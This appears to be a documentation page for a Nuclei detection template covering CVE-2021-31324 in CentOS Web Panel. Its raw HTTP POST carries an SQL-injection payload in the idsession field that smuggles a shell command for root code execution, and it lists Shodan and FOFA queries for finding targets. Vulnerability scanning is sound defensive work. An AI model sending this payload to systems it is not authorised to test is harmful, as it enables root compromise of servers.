Skip to content
Nuclei Templates

CentOS Web Panel - OS Command Injection

ID: CVE-2021-31324

Severity: critical

Author: ritikchaddha

Tags: cve,cve2021,centos,cwpsrv,os,rce

Description

Section titled “Description”

The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.

YAML Source

Section titled “YAML Source”
id: CVE-2021-31324


info:
  name: CentOS Web Panel - OS Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    The unprivileged user portal part of CentOS Web Panel is affected by a Command Injection vulnerability leading to root Remote Code Execution.
  reference:
    - https://www.shielder.com/advisories/centos-web-panel-idsession-root-rce/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-31324
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-31324
    cwe-id: CWE-78
    cpe: cpe:2.3:a:control-webpanel:webpanel:-:*:*:*:*:*:*:*
  metadata:
    vendor: control-webpanel
    product: webpanel
    shodan-query: title:"Login | Control WebPanel"
    fofa-query: title="Login | Control WebPanel"
  tags: cve,cve2021,centos,cwpsrv,os,rce


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "cwpsrv")'
        internal: true


  - raw:
      - |
        POST /login/index.php?acc=newpass HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        pass1=c3VwZXJwYXNzd29yZA%3D%3D&idsession=a%27+UNION+SELECT%27a%27%2C%27b%27%2C%27c%27%2C%27YWJjIiBVTklPTiBTRUxFQ1QgJ2EnLCdiJywnYycsJ2QnLCcrMSBkYXknLCdmJy0tIHAiO2lkOyNgfHxhfHxifHxjfHxk%27%2C%27e%27%2C%27f%27--+p


    matchers:
      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"
# digest: 4b0a00483046022100fe796d73011664d0dd5f0327b74c0cef3c94bda4092bc53682a7577d3a08b786022100cad5a0df17702f8a2774c4921e802acbb3536295f004cd0ab745e24610d6f290:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-31324.yaml"

View on Github